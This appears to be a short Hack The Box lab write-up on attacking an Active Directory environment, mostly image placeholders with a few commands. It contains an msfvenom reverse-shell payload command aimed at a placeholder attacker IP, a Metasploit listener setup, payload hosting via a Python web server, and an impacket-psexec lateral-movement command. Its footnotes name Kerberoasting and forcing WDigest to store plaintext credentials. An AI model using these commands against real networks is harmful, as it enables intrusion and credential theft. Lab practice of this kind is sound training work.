AD Enumeration & Attacks Skills Assessment Part I

Feb 11, 2025    #htb   #cybersec  

Initial Access

Reconnaissance

Given the Scenario, we get the user admin and the password My_W3bsH3ll_*********, so we login with the credentials:

Image

Question 1 - Submit the contents of the flag.txt file on the administrator Desktop of the web server

Image

Reverse Shell Using Metasploit

  1. Payload Generation
    msfvenom -p windows/x64/meterpreter/reverse_https lhost=<attacker_ip> -f exe -o payload.exe lport=4444
    
Image
  1. Metasploit Listener Configuration
    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_https
    set LHOST 10.10.15.161
    set LPORT 4444
    
Image
  1. Payload Delivery And Execution
    python3 -m http.server
    
Image

Question 2 - Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer

Image

Question 3 - Crack the account’s password. Submit the cleartext value.

Image
Image

Question 4 - Submit the contents of the flag.txt file on the Administrator desktop on MS01

Image
Image

Now using impacket-pssexec we can get the flag:

proxychains impacket-psexec INLANEFREIGHT.LOCAL/<user>:<password>@<Target>
Image

Question 5 - Find cleartext credentials for another domain user. Submit the username as your answer.

Image
Image

Question 6 - Submit this user’s cleartext password.

Image
Image

Question 7 - What attack can this user perform?

Image

Question 8 - Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01


  1. Kerberoasting - from Windows  ↩︎

  2. Using PowerView to Target a Specific User  ↩︎

  3. Establishing WinRM Session from Windows  ↩︎

  4. Connect to a FreeRDP server with a shared directory  ↩︎

  5. Forcing WDigest to Store Credentials in Plaintext  ↩︎

  6. Using Get-DomainUser to View a User Group Membership  ↩︎